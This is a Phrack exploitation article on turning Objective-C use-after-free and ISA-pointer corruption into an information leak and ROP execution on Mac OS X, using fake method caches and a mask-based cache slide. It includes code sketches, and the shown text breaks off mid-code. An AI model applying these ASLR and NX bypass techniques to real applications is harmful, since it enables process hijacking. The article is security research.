                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by nemo ]=------------------------------=|
|=-----------------------=[ nemo@felinemenace.org ]=---------------------=|
|=-----------------------------------------------------------------------=|

--[ Introduction

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straightforward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives in an attempt to bypass each of the
memory protection hurdles present on a modern-day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in modern times.
Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to turn
the most common Objective-C memory corruption primitive (an attacker
controlled Objective-C method call) into control of EIP. If you have not
read this paper, or if it's been a while and you need to refresh, it's
probably wise to do so now, as the first half of this paper will only build
on the techniques covered in the original [1]. Contrary to the beliefs of
Ian Beer, the techniques in the original paper are still alive and kicking
in modern times; however, some adjustment is needed depending on the
context of the vulnerability.

--[ Dangling Objective-C Method Calls

As you're aware since you read my paper in [1], Objective-C method calls
are implemented by passing "messages" to the receiver (object) via the
objc_msgSend() API call.
When Objective-C objects are allocated, storage for their instance
variables is allocated on the native heap with malloc(). The first element
in this space is a pointer to the class definition in the binary. This is
typically referred to as the "ISA" pointer. As in: "an NSString 'IS-A'
NSObject".

When dealing with bugs in Objective-C applications it is extremely common
for this ISA pointer to be attacker controlled, resulting in an Objective-C
method call being performed on an attacker-controlled memory location.
This can occur when dealing with use-after-free conditions, heap overflows
into Objective-C objects, and even format string bugs using the %@ format
specifier.
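
As a contrived illustration of the use-after-free case of this primitive,
consider the following sketch (compiled without ARC; the "Victim" class
and the heap grooming step are of course hypothetical):

        #import <Foundation/Foundation.h>
        #include <stdio.h>

        @interface Victim : NSObject
        - (void)poke;
        @end

        @implementation Victim
        - (void)poke { printf("still alive\n"); }
        @end

        int main(void)
        {
            Victim *v = [[Victim alloc] init];
            [v release];    // allocation freed, 'v' left dangling

            // ... heap grooming reclaims the freed chunk with attacker
            // data, the first word of which becomes the fake ISA ...

            [v poke];       // objc_msgSend(v, @selector(poke)) now reads
                            // the ISA pointer, and through it the method
                            // cache, from attacker controlled memory
            return 0;
        }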

In my original paper [1] I wrote about how to utilize this construct to
perform a successful cache lookup for the selector value, resulting in
control of EIP. An alternative route to gain EIP control is to make the
Objective-C runtime think that it has finished looking through the entire
cache and found no match for the SEL value passed in, in which case the
runtime will attempt to resolve the method's address via the class
definition (through the controlled ISA pointer) and once again use an EIP
value from memory controlled by us. This method is longer, however, and
adds little benefit. But I digress; both of these methods are still
completely valid on the most current version of Mac OS X at the time of
writing, Yosemite (10.10).

While, at the time of the Phrack 0x42 release, this technique was fairly
useful by itself, in modern times EIP/RIP control is only a small victory
and in no way wins the battle of process control. This is because, even
with direct control of EIP, modern NX and ASLR make it difficult to know a
reliable absolute location in which we can store a payload and return to
execute it.

From what I've seen, the most commonly used technique to bypass this
currently is to combine an EIP control primitive with an information leak
of a .text address in order to construct a ROP chain (returning repeatedly
into the text segment) which either executes the needed functionality,
mprotect()'s some shellcode before executing it, or loads an existing
executable or shared library.

Under the right conditions, it is possible to skip some of these steps
and turn a dangling Objective-C method call into both an information leak
and execution control.

In order to use this technique, we must first know the exact binary version
in use on the target. Thankfully on Mac OS X this is usually pretty easy as
automatic updates mean that most people are running the same binary
version.

The specifics of the technique differ depending on the architecture of the
target system, as well as the location of the particular SEL string which
is used in the dangling method call construct.

Since we are already familiar with 32-bit internals, we will begin our
investigation of dangling objc_msgSend() exploitation with the 32-bit
runtime, before moving on to look at the changes in the new run-time on
64-bit.

--[ 32-bit dangling objc_msgSend()

Firstly, 32-bit processes utilize the old Objective-C runtime, so the
specifics of the internals are identical to what is documented in my
original paper. However, depending on the location of the module
containing the selector string, the technique varies slightly.

----[ 32-bit Shared Region

The shared-region is a mapping which is common to all processes on the
system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this
space. This file is generated by the "update_dyld_shared_cache" utility
during system update, and contains a large selection of libraries which are
commonly used on the system. The .paths files in
"/var/db/dyld/shared_region_roots" dictate which files are contained
within. The order in which each library is added to this file is
randomized, therefore the offset into the file for a particular library
cannot be relied on. Reading the file
'/var/db/dyld/dyld_shared_cache_i386.map' shows the order of these files.

For 32-bit processes, this file is mapped at the fixed address 0x90000000.
At this location there is a structure which describes the contents of the
shared region.

This technique, once again, revolves around the ability to control the ISA
pointer, and to point it at a fake class struct in memory. In order to
demonstrate how this works, a small sample Objective-C class was created
(shown below). The complete example of this technique is included at the
end of this paper in the uuencoded files blob.

        [leakme.m]

        #import "leakme.h"

        @implementation leakme
        -(void) log
        {
            printf("lol\n");
        }
        @end

In main.m, we create an instance of this object, and then use sprintf() to
write out a string representation of the object's address, before converting
it back with atol(). This is pretty confusing, but it's basically an easy
way to trick the compiler into giving us a void pointer to the object. Type
casting the object pointer directly will not compile with gcc.

        printf("[+] Class @ 0x%lx\n",l);
        sprintf(num,"%li",l);
        long *ptr = atol(num);
        ...
        printf("[+] Overwriting object\n");
        *ptr = &fc; // isa ptr

By overwriting the ISA pointer with the address of an allocation we
control, we can easily simulate a vulnerable scenario. Obviously in the
real world things are not that easy. We need to know the address of an
allocation which we control. There are a variety of ways this can be
accomplished. Some examples of these are:

- Using a leak to read a pointer out of memory.
- Abusing language weaknesses to infer an address. [2]
- Abusing the predictable nature of large allocations.

However, these concepts are the topic of many other discussions and not
relevant to this particular technique.

As a quick refresher, the first thing the Objective-C runtime does when
attempting to call a method for an object (objc_msgSend()) is to retrieve
the location of the method cache for the object. This is done by
offsetting the ISA pointer by 0x20 and reading the pointer at this
location. To control this cache pointer we use the following structure:

        struct fakecache {
            char pad[0x20];
            long cache_ptr;
        };
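
For reference, the 0x20 offset falls straight out of the legacy 32-bit
class layout (shown roughly below, as per the old runtime headers); with
4-byte pointers the cache pointer sits 0x20 bytes into the class
definition:

        struct objc_class_old {
            struct objc_class_old *isa;         // 0x00
            struct objc_class_old *super_class; // 0x04
            const char *name;                   // 0x08
            long version;                       // 0x0c
            long info;                          // 0x10
            long instance_size;                 // 0x14
            void *ivars;                        // 0x18 objc_ivar_list *
            void *methodLists;                  // 0x1c objc_method_list **
            void *cache;                        // 0x20 the pointer we fake
            void *protocols;                    // 0x24 objc_protocol_list *
        };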

In the example code we use a separate allocation for the fakecache struct
and the cache itself. However in a real scenario the address of the cache
itself would most likely be the same address as the fakecache offset by
0x24. This would allow us to use a single allocation, and therefore a
single address, reducing the constraints of the exploit. Also, in a real
world case we could leak the address of the cache_ptr, then subtract 0x20
from its address. This would allow us to shave 0x20 bytes off of the
buffer we need to control.
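
In other words, in the single-allocation case the controlled buffer could
be laid out roughly as follows (a sketch; the mask and occupied fields
follow the legacy objc_cache layout):

        struct fakeobj {
            char pad[0x20];        // 0x00: remaining fake class fields
            long cache_ptr;        // 0x20: set to (this buffer + 0x24)
            unsigned int mask;     // 0x24: the fake cache starts here
            unsigned int occupied; // 0x28
            long buckets[1];       // 0x2c: bucket pointers follow
        };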

Next, objc_msgSend() traverses the cache looking for a cached method call
matching the desired implementation. This is done by iterating through a
series of pointers to cache entries. Each entry contains a SEL which
matches the cached method SEL in the .text segment of the Objective-C
binary. By comparing this SEL value with the SEL value passed to
objc_msgSend() the matching entry can be located and used. Rather than
iterating through every pointer to find the appropriate cache entry each
time, however, the selector pointer is shifted and a mask is applied to it.
The resulting bits are used as an index into the cache table entry pointer
array. Then, starting at this index, each entry is inspected.
This means that multiple entries can have the same index, however it
greatly reduces the search time of the cache. Controlling the mask provides
us with the mechanism we need to create a leak.
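
Put more concretely, the lookup boils down to something like the following
simplified C model (the real routine is hand-written assembly and probes
subsequent entries on a mismatch):

        struct cacheentry {
            long sel;          // method_name: compared against the SEL
            long pad;          // method_types (unused here)
            long eip;          // method_imp: where objc_msgSend() jumps
        };

        struct cache {
            unsigned int mask;     // attacker controlled in our scenario
            unsigned int occupied;
            struct cacheentry *buckets[1];
        };

        long cache_lookup(struct cache *c, unsigned long sel)
        {
            unsigned long index = (sel >> 2) & c->mask;  // hash the SEL
            struct cacheentry *e = c->buckets[index];

            if (e && (unsigned long)e->sel == sel)
                return e->eip; // hit: execution continues at this address
            return 0;          // miss: fall back to the slow path
        }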

Ok, so going back to the mask. In my original Objective-C paper, we set the
mask to 0. This forced the runtime to use the first cache entry (index 0)
regardless of what value the SEL had. In this case, however, we want to
abuse the mask in order to isolate the "randomized" unpredictable bits in
the selector pointer value (SEL).

Below, we can see a "real" SEL value from a 10.10 system, which is located
in the shared_region.

        (lldb) x/s $ecx
        0x90f3f86e: "length"

Since we know that the shared region begins at 0x90000000, we know that the
first nibble will always be 0x9. We also know that the offset into the page
which contains the SEL will always be the same, therefore the last 3
nibbles, 0x86e, will be the same for the binary version we retrieve the SEL
value from. However, we cannot count on the rest of the SEL value being the
same on the system we are running our exploit against.

For the value 0x90f3f86e we can see the bit pattern looks as follows:

          9   0    f    3    f     8    6   e
        1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e

Based on what we just discussed the mask which would retrieve the bits we
care about looks as follows:

         0    f    f     f   f     0   0    0
        0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000

However, since objc_msgSend() shifts the SEL 2 to the right prior to
applying the mask, we must shift our mask to account for this.

This leaves us with:

         0    3    f    f    f    c    0    0
        0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00

As you remember, objc_msgSend() applies the following calculation to
generate the index into the cache entries:

        index = (SEL >> 2) & mask

Filling in the values for this leaves us with an index like:

        index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00
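
A couple of lines of C confirm the arithmetic (values taken from the
example above):

        #include <stdio.h>

        int main(void)
        {
            unsigned long sel  = 0x90f3f86e; // "length" on the reference box
            unsigned long mask = 0x03fffc00; // pre-shifted randomized-bit mask

            printf("index = 0x%lx\n", (sel >> 2) & mask); // 0x3cfc00
            return 0;
        }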

This means that for our particular SEL value the runtime will index
0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from
this location. It will then dereference the pointer and check for a SEL
match at that location. By creating a giant cache slide containing an
entry for every possible slide value, we can make sure that this location
contains the right values no matter which slide is actually in use.

In the 32-bit runtime (the old runtime) the cache index is used to retrieve
a pointer to a cache_entry from an array of pointers (the buckets array).
In our example code (main.m) we set the buckets array up as follows:

        long *buckets = malloc((CACHESIZE + 1) * sizeof(void *));

However, in a typical exploitation scenario, this array would be part of
the single large allocation which we control.

For each of the bucket pointers, a cache entry must be allocated. In the
example code we can use the following struct for each of these entries:

        struct cacheentry {
                long sel;
                long pad;
                long eip;
        };


Each of these structures must be populated with a different SEL and EIP
value depending on its index into the table. For each of the possible
index values, we add the (unshifted) randomized bits to the SEL base.
This way the appropriate SEL is guaranteed to match after the mask is
applied and used to index the table.

For the EIP value, we can utilize the fact that the string table containing
the SEL string is always at a fixed offset from the .text segment within
the same binary. The diagram below shows this more clearly.

        ,_______________,<--- Mach-O base address
        |               |
        | mach-o header |
        +---------------+
        |               |<--- SEL in string table, relative to base
        | string table  |    /\ Relative offset
        +---------------+    \/ from SEL to ROP gadgets
        |               |<--- ROP gadget in .text segment
        | .text segment |
        '---------------'

For each possible entry in the table, the EIP value must be set to the
appropriate address relative to the SEL value used. The quickest way I know
to calculate these values is to break on the objc_msgSend function and dump
the current SEL value. In lldb this is simply a case of using "reg read
ecx". Next, "target modules list -a $ecx" provides us with the module base.
By subtracting the module base from the absolute SEL address we can get the
relative offset within the module. This can be repeated for the gadget
address within the same module. Next, when populating the table, we simply
need to add these two relative offsets to our potential module base
candidate. We increment the module base candidate for each entry in the
table.
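
A minimal sketch of what that population loop could look like is shown
below. This is not the code from the example files; sel_rel and gadget_rel
are the two relative offsets recovered with lldb as described above, and
idx_min/idx_max are the possible index values derived from the shared
region bounds discussed just below.

        // struct cacheentry as shown earlier: { long sel, pad, eip; }
        void populate_slide(long *buckets, struct cacheentry *entries,
                            unsigned long idx_min, unsigned long idx_max,
                            unsigned long sel_rel, unsigned long gadget_rel)
        {
            unsigned long page_off = sel_rel & 0xfff; // fixed low 12 SEL bits

            for (unsigned long idx = idx_min; idx <= idx_max; idx += 0x400) {
                // Rebuild the SEL that hashes to this index: undo the >>2
                // shift and restore the fixed shared region/page offset bits.
                unsigned long sel  = 0x90000000UL | (idx << 2) | page_off;

                // The module base candidate implied by that SEL, and the
                // gadget address at its known relative offset from it.
                unsigned long base = sel - sel_rel;

                entries[idx].sel = (long)sel;
                entries[idx].eip = (long)(base + gadget_rel);
                buckets[idx]     = (long)&entries[idx];
            }
        }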

By populating our cache slide in this way we are guaranteed the execution
of a single ROP gadget within the module that our SEL is in. This can be
enough for us to succeed. We will look into ways to use this construct
later.

Obviously the allocation used for this 32-bit technique is very large. To
calculate the size of the cache slide we need to generate, we must look at
the size of the shared region. The shared region always starts at
0x90000000, but the first module inside the shared region starts at
0x90008000. The end of the shared region depends on the number of modules
loaded in the shared region. On the latest version of Mac OS X at this
time, the end of the shared region is located at 0x9c391000. The bit
patterns for these are shown below.

10010000 00000000 10000000 00000000 :: SR START -- 0x90008000
10011100 00111001 00010000 00000000 :: SR END   -- 0x9C391000

00001111 11111111 11110000 00000000 :: MASK UNSHIFTED

If we mask off the bits we care about in these addresses using the
unshifted mask, and then apply the same >>2 shift, we get the following
bounds for our potential index values.

00000000 00000000 00100000 00000000  -- smallest index value - 0x2000
00000011 00001110 01000100 00000000  -- biggest  index value - 0x30E4400

Since the buckets array is an array of 4 byte pointer values we can
multiply the largest index by 4, giving us 0xc391000. Each cache entry
pointed to by a bucket is 12 bytes in size. This means that the size of the
cache entry array is 0x24ab3000.

By adding these two values together we get the total size of our cache
slide, 0x30e44000 bytes.

Allocations of this size can be difficult to make depending on the target
application. However, also due to the size, they are predictably placed
within the address space. This buffer can be made from JavaScript for
example.

----[ Uncommon 32-bit Libraries

Libraries which are not contained within the shared region are mapped in by
the dynamic linker when an executable that requires them as a dependency is
loaded.

The location of these modules is always relative to the end of the
executable file, and they are loaded in the order specified by their
LC_LOAD_DYLIB load commands.

When loading the executable file, the kernel generates a randomized slide
value for ASLR. This value is added to the desired segment load addresses
in the executable (if it's compiled with PIE) and then the executable is
re-based to that location.

        uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) +